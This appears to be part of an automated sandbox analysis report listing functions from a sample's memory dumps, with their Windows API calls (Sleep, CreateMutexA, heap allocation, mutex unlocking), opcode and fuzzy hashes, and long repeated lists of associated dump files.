Instruction Fuzzy Hash: F5214971704200EBFB189B6CEC8EB6DF761EBD1310F204229E584EB2D6DB7D99818712

Function 0073A856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0073A963
CreateMutexA.KERNELBASE(00000000,00000000,00793254), ref: 0073A981

Strings

T2y, xrefs: 0073A970

Memory Dump Source

Source File: 00000002.00000002.2163924362.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000002.00000002.2163902961.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163924362.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163984341.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164000077.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164016747.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164032124.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164047249.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164156291.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164172281.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164223110.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164239397.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164254067.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164269657.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164288589.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164303316.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164322811.000000000095D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164341767.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164356585.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164371147.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164390667.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164404591.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164418294.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164433546.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164445961.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164458683.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164474032.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164487578.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164503877.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164518726.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164533696.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164548274.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164563151.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164578494.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164597030.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164747797.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164765720.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164782800.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164799607.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164817438.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164836755.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164852787.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164871471.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164887698.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2y
API String ID: 1464230837-1348321943
Opcode ID: f616225581e1ce95a1e4940461dbbad61a36906f45b51f9cf17703f279a3f554
Instruction ID: ceb61d6493f53455b59dfb4430585f8459ac58f73fccba5f9a4160a6724b5766
Opcode Fuzzy Hash: f616225581e1ce95a1e4940461dbbad61a36906f45b51f9cf17703f279a3f554
Instruction Fuzzy Hash: 90213D71359201EAFB396768AC9FBBDB3119FA1300F24041AE5C4E62D3DB7E59818293

Function 0073A34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0073A963
CreateMutexA.KERNELBASE(00000000,00000000,00793254), ref: 0073A981

Strings

T2y, xrefs: 0073A970

Memory Dump Source

Source File: 00000002.00000002.2163924362.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000002.00000002.2163902961.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163924362.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163984341.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164000077.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164016747.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164032124.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164047249.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164156291.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164172281.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164223110.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164239397.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164254067.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164269657.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164288589.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164303316.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164322811.000000000095D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164341767.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164356585.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164371147.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164390667.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164404591.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164418294.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164433546.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164445961.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164458683.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164474032.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164487578.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164503877.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164518726.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164533696.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164548274.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164563151.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164578494.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164597030.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164747797.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164765720.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164782800.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164799607.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164817438.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164836755.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164852787.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164871471.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164887698.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2y
API String ID: 1464230837-1348321943
Opcode ID: 23e8133127a97374bb2507867e47247ceab538080a4c222441448baba7164eeb
Instruction ID: 4c6670233e40eeceaf2d2ce515905a9b2ce3409e5160d5f1979461a3fe11dbbe
Opcode Fuzzy Hash: 23e8133127a97374bb2507867e47247ceab538080a4c222441448baba7164eeb
Instruction Fuzzy Hash: 57214C71704200ABFB189B6CEC8E76DB761EBD1310F244229E484E76D6DB7E59808752

Function 0076D82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0076A813,00000001,00000364,00000006,000000FF,?,0076EE3F,?,00000004,00000000,?,?), ref: 0076D870

Memory Dump Source

Source File: 00000002.00000002.2163924362.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000002.00000002.2163902961.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163924362.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163984341.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164000077.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164016747.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164032124.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164047249.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164156291.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164172281.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164223110.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164239397.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164254067.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164269657.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164288589.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164303316.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164322811.000000000095D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164341767.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164356585.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164371147.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164390667.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164404591.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164418294.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164433546.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164445961.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164458683.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164474032.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164487578.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164503877.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164518726.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164533696.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164548274.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164563151.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164578494.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164597030.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164747797.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164765720.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164782800.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164799607.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164817438.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164836755.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164852787.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164871471.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164887698.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6894e38581caa1fca270c574c8528157afba8b721c66e74b6721e6ee324b1fa9
Instruction ID: f39659186f759222b2df86ca1695f797a60e1e026b81d831055f3dd6bdf28410
Opcode Fuzzy Hash: 6894e38581caa1fca270c574c8528157afba8b721c66e74b6721e6ee324b1fa9
Instruction Fuzzy Hash: 48F0E932F25126A6DB312A729C0DA5B37599F417B0B198121ED07A7192DA2CDC0085E0

Non-executed Functions

Function 0076CBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0076CC66

Strings

vv, xrefs: 0076CBE1

Memory Dump Source

Source File: 00000002.00000002.2163924362.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000002.00000002.2163902961.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163924362.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163984341.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164000077.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164016747.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164032124.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164047249.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164156291.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164172281.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164223110.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164239397.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164254067.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164269657.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164288589.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164303316.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164322811.000000000095D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164341767.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164356585.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164371147.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164390667.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164404591.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164418294.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164433546.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164445961.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164458683.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164474032.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164487578.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164503877.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164518726.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164533696.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164548274.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164563151.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164578494.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164597030.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164747797.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164765720.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164782800.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164799607.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164817438.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164836755.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164852787.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164871471.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164887698.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID: vv
API String ID: 3213747228-607297253
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: 6c7083fed2a8049aca15ea981f9e7456f49c71c07049fe5f865e23989fb85647
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: E2B14932A046859FDB16CF28C8857BEBBF5EF45340F1481AADC96EB242D63D9D01CB60

Function 00732EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00732F5F
__Mtx_unlock.LIBCPMT ref: 00732FCC
__Cnd_broadcast.LIBCPMT ref: 00732FE3
__Mtx_unlock.LIBCPMT ref: 007330F5
__Mtx_unlock.LIBCPMT ref: 0073319B

Memory Dump Source

Source File: 00000002.00000002.2163924362.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000002.00000002.2163902961.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163924362.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163984341.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164000077.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164016747.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164032124.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164047249.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164156291.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164172281.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164192954.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164223110.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164239397.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164254067.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164269657.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164288589.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164303316.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164322811.000000000095D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164341767.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164356585.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164371147.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164390667.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164404591.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164418294.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164433546.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164445961.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164458683.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164474032.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164487578.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164503877.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164518726.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164533696.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164548274.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164563151.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164578494.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164597030.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164612393.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164747797.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164765720.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164782800.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164799607.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164817438.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164836755.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164852787.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164871471.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2164887698.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: c0905383e6e8620008460a044dc71b55bb03f46ab9bfdeb0824409dcdc021d0d
Instruction ID: 8ded3803558d6b1c58fd23a82389b68276da60ae64fd2fb774943e459fd1aaf7
Opcode Fuzzy Hash: c0905383e6e8620008460a044dc71b55bb03f46ab9bfdeb0824409dcdc021d0d
Instruction Fuzzy Hash: 80A1F5B1A01609EFEB25DF64C94876AB7B8FF15310F048139E815D7242EB79DA05CBD1

Function 0074BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0074BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 0074BBE4
_xtime_get.LIBCPMT ref: 0074BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 0074BC13

Memory Dump Source

Source File: 00000002.00000002.2163924362.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000002.00000002.2163902961.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2163924362.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
